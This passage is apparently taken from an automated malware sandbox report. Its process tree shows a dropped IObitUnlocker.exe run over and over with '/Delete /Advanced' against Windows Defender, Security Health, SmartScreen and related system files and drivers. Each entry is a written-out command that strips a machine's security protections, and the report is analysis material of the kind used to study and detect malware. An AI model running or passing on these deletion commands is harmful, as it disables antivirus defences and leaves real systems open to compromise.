\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3584
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:2012
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4328
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1544
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5696
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5264
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4676
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:6068
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1736
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1592
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 
Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3568
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 
Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
